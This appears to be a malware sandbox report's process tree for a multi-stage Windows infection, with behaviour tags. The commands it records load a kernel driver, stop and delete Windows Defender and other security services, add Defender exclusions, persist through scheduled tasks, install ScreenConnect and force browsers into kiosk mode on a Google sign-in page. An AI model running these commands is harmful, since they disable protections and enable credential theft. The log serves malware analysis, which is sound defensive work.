C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1FD7.tmp\1FD8.tmp\1FD9.bat C:\Users\Admin\AppData\Local\Temp\221.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\20B2.tmp\20B3.tmp\20B4.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:4500
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:872
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:3208
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:3440
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2172
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3476
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4568
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:3196
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:3816
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:2252
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:1656
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:4548
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:2064
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:2648
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:440
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:4324
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵PID:1440
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:1452
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:212
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:1040
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:3748
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:2960
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:752
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:4320
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:4308
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:836
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵PID:644
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:2400
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵PID:1804
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:1300
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:3588
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:3348
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:2580
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:1036
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:4500
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:3168
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:660
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:4528
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:3180
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:316
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:4972
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:4864
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:3972
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:4028
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵PID:1596
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:4716
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:4840
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:1324
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:1956
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:4128
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:1228
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:676
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:1876
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:2864
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:2020
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:3968
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:1424
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:4296
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:2236
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4504
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:2148
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe"C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2544 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"7⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3480
-
-
-
C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:212 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67e8f4de3ad1d.vbs7⤵
- Checks computer location settings
- Modifies registry class
PID:3076 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"8⤵PID:3348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4028 -
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2252 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C4F.tmp\7C60.tmp\7C61.bat C:\Users\Admin\AppData\Local\Temp\221.exe"8⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2148 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7D0B.tmp\7D0C.tmp\7D0D.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"10⤵
- Drops file in Program Files directory
PID:4128 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:3892
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵PID:4196
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:5012
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4968
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:232
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4308
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4320
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:1244
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:2568
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:1300
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:1388
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵PID:2896
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:2512
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:5060
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:1816
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:4452
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:3012
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:4632
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:444
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵PID:4056
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵PID:1284
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵PID:4408
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵PID:1556
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:2288
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:3668
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:5028
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵PID:1484
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:1044
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵PID:3664
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:4972
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:2332
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1876
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:3816
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:3752
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:4028
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:2864
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:540
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵PID:440
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:2648
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:1440
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:4504
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:4324
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:4980
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:3092
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:3204
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:4624
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:3596
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:5040
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:5012
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:4968
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:3488
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:752
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:4320
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:4008
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:2568
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:1300
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:1388
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:3016
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:3616
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4788
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:4452
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4324 -
C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1332 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3004
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
PID:2824 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:3816
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:444
-
-
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\is-R9EHL.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-R9EHL.tmp\Bell_Setup16.tmp" /SL5="$B02D0,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4028 -
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\is-MA2DI.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-MA2DI.tmp\Bell_Setup16.tmp" /SL5="$1101EA,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2512 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1300
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -NoProfile -NonInteractive -Command -13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1456
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"8⤵
- Executes dropped EXE
PID:5192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"9⤵
- Command and Scripting Interpreter: PowerShell
PID:5640
-
-
C:\Users\Admin\AppData\Roaming\BExplorer\bot.exeC:\Users\Admin\AppData\Roaming\BExplorer\bot.exe9⤵
- Executes dropped EXE
PID:6312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"10⤵
- Command and Scripting Interpreter: PowerShell
PID:6348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045200101\50981a7f32.exe"C:\Users\Admin\AppData\Local\Temp\10045200101\50981a7f32.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7060 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10045200101\50981a7f32.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6500
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045210101\8ffa067850.exe"C:\Users\Admin\AppData\Local\Temp\10045210101\8ffa067850.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6540 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10045210101\8ffa067850.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6712
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045220101\e269e6c0d6.exe"C:\Users\Admin\AppData\Local\Temp\10045220101\e269e6c0d6.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5980
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10380550101\e9ea3a76fa.exe"C:\Users\Admin\AppData\Local\Temp\10380550101\e9ea3a76fa.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2880
-
-
C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"6⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NP4kBrG.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2692
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "smss" /tr "C:\Users\Admin\AppData\Local\Temp\smss.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:4368
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381450101\2983c11b74.exe"C:\Users\Admin\AppData\Local\Temp\10381450101\2983c11b74.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4268
-
-
C:\Users\Admin\AppData\Local\Temp\10381460101\05be0399a2.exe"C:\Users\Admin\AppData\Local\Temp\10381460101\05be0399a2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2856
-
-
C:\Users\Admin\AppData\Local\Temp\10381470101\7ef3f93a66.exe"C:\Users\Admin\AppData\Local\Temp\10381470101\7ef3f93a66.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:444 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4368
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3368
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3032
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2588
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3440 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {eda74055-35d7-4bdd-a1fb-d743c4cb5cae} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:4368
-
-
